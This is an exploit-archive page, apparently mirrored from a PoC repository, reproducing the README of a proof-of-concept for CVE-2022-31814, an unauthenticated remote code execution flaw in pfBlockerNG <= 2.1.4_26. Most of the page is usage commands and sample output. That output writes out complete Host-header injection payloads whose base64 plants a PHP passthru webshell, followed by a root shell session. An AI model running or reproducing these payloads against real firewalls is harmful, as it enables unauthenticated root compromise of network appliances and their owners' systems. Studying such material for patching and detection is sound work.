关联漏洞
描述
Updated Exploit - pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)
介绍
# CVE-2022-31814
Updated Exploit - pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)
## Description
This script is a proof-of-concept exploit for pfBlockerNG <= 2.1.4_26 that allows for remote code execution. It takes a single target URL or a list of URLs, tries to upload a shell using multiple payloads, executes a command, and then deletes the shell.
## Requirements
This script requires Python 3.x and the request module to be installed. You can install these modules by running:
```bash
pip3 install requests
```
or
```bash
pip3 install -r requirements.txt
```
## Usage
```bash
usage: CVE-2022-31814.py [-h] --url URL
pfBlockerNG <= 2.1.4_26 Unauth RCE
options:
-h, --help show this help message and exit
--url URL Full URL and port e.g.: https://10.10.10.10:443/
```
## Exploit Execution
```bash
python3 CVE-2022-31814.py --url "https://10.10.10.10:443/"
```
## Output
```
[+] pfBlockerNG is installed
[/] Uploading shell...
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python2 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKHBhc3N0aHJ1KCAkX0dFVFsiYyJdKSk7Pz4nO2Z3cml0ZSgkYSwkdCk7ZmNsb3NlKCAkYSk7Pz4='|python -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKHBhc3N0aHJ1KCAkX0dFVFsiYyJdKSk7Pz4nO2Z3cml0ZSgkYSwkdCk7ZmNsb3NlKCAkYSk7Pz4='|python3 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKHBhc3N0aHJ1KCAkX0dFVFsiYyJdKSk7Pz4nO2Z3cml0ZSgkYSwkdCk7ZmNsb3NlKCAkYSk7Pz4='|python2 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKHBhc3N0aHJ1KCAkX0dFVFsiYyJdKSk7Pz4nO2Z3cml0ZSgkYSwkdCk7ZmNsb3NlKCAkYSk7Pz4='|python3.8 -m base64 -d | php; '"}
[+] Upload succeeded
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# whoami
root
# ^C[+] Shell deleted
```
文件快照
[4.0K] /data/pocs/3e90274e407f39cd1d1e1f13dc3387cf5a68f1dc
├── [4.9K] CVE-2022-31814.py
├── [3.1K] README.md
└── [ 17] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。